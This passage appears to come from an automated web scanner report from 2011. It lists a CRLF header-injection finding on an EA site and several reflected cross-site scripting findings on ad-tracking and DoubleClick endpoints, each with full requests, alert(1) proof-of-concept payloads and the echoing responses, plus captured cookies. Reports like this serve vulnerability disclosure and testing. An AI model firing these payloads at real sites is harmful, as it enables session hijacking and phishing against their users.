Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=1&version=454ba
35cbc67735f&os=windows&key=SMB015741170000
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

3.8. http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tos.ea.com
Path:   /legalapp/WEBPRIVACY/US/en/PC/

Issue detail

The value of REST URL parameter 3 is copied into the Content-Location response header. The payload ad77b%0d%0af03b2834043 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /legalapp/WEBPRIVACY/ad77b%0d%0af03b2834043/en/PC/ HTTP/1.1
Host: tos.ea.com
Proxy-Connection: keep-alive
Referer: http://customersupport.ea.com/loginapp/forgotScreenName.do?locale=en_US&surl=http%3A%2F%2Fsupport.ea.com%2Fci%2Fpta%2Flogin&curl=http%3A%2F%2Fsupport.ea.com%2Fapp%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A//www.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:21 GMT
Server: Apache/2.0.59 (Unix) mod_jk/1.2.23
Cache-Control: no-cache
Content-Location: webprivacy/ad77b
f03b2834043/en/pc/default/54402_6/54402_7
Content-Type: text/html;charset=UTF-8
Content-Length: 46341

<div style="text-align: center;"><span style="font-weight:
bold;">ELECTRONIC ARTS PRIVACY
POLICY</span><br><br><span style="font-weight:
bold;">Effective Date</span>: June 3, 2011
</div><a hre
...[SNIP]...
4. Cross-site scripting (reflected)  previous  next
There are 165 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload f62bc<script>alert(1)</script>2b3e2ee739c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480f62bc<script>alert(1)</script>2b3e2ee739c&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:10 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480f62bc<script>alert(1)</script>2b3e2ee739c-SM=adver_06-24-2011-13-31-10; expires=Mon, 27-Jun-2011 13:31:10 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480f62bc<script>alert(1)</script>2b3e2ee739c-VT=adver_06-24-2011-13-31-10_13822592201308922270; expires=Wed, 22-Jun-2016 13:31:10 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480f62bc<script>alert(1)</script>2b3e2ee739c-nUID=adver_13822592201308922270; expires=Fri, 24-Jun-2011 13:46:10 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480f62bc<script>alert(1)</script>2b3e2ee739c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='13822592201308922270';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';thi
...[SNIP]...
4.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload d4b45<script>alert(1)</script>3ebdfa8abb3 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adverd4b45<script>alert(1)</script>3ebdfa8abb3&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:08 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-26-48_11053703061308922008ZZZZadverd4b45%3Cscript%3Ealert%281%29%3C%2Fscript%3E3ebdfa8abb3_06-24-2011-13-31-08_15902481321308922268; expires=Wed, 22-Jun-2016 13:31:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11053703061308922008ZZZZadverd4b45%3Cscript%3Ealert%281%29%3C%2Fscript%3E3ebdfa8abb3_15902481321308922268; expires=Fri, 24-Jun-2011 13:46:08 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adverd4b45<script>alert(1)</script>3ebdfa8abb3';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15902481321308922268';t
...[SNIP]...
4.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b976e<script>alert(1)</script>1209bb882db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/b976e<script>alert(1)</script>1209bb882db&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:16 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:16 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-16_18074100621308922276; expires=Wed, 22-Jun-2016 13:31:16 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_18074100621308922276; expires=Fri, 24-Jun-2011 13:46:16 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='18074100621308922276';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/b976e<script>alert(1)</script>1209bb882db';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...
4.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 317e7<script>alert(1)</script>655da98b355 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=317e7<script>alert(1)</script>655da98b355&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:12 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:12 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-12_14677270321308922272; expires=Wed, 22-Jun-2016 13:31:12 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_14677270321308922272; expires=Fri, 24-Jun-2011 13:46:12 GMT; path=/; domain=c3metrics.com
Content-Length: 6691
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='14677270321308922272';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='317e7<script>alert(1)</script>655da98b355';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...
4.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 7dc4a<script>alert(1)</script>ae80ab2d3c2 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=727dc4a<script>alert(1)</script>ae80ab2d3c2&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:12 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Sun, 24-Jul-2011 20:31:12 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-12_12674423691308922272; expires=Wed, 22-Jun-2016 13:31:12 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_12674423691308922272; expires=Fri, 24-Jun-2011 13:46:12 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='12674423691308922272';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='727dc4a<script>alert(1)</script>ae80ab2d3c2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...
4.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 58282<script>alert(1)</script>261c16694b8 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=58282<script>alert(1)</script>261c16694b8&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:13 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-13_6450759631308922273; expires=Wed, 22-Jun-2016 13:31:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_6450759631308922273; expires=Fri, 24-Jun-2011 13:46:13 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='6450759631308922273';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='58282<script>alert(1)</script>261c16694b8';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...
4.7. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb131'-alert(1)-'6963b864478 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0fb131'-alert(1)-'6963b864478&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:32:25 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0fb131'-alert(1)-'6963b864478&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...
4.8. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f90"-alert(1)-"9faeef96f93 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=030f90"-alert(1)-"9faeef96f93&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5917
Date: Fri, 24 Jun 2011 13:32:21 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b30/f/7e/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=030f90"-alert(1)-"9faeef96f93&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaq
...[SNIP]...
4.9. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [forced_click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9297"-alert(1)-"8496255074b was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=a9297"-alert(1)-"8496255074b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5856
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 24 Jun 2011 13:32:37 GMT
Expires: Fri, 24 Jun 2011 13:32:37 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
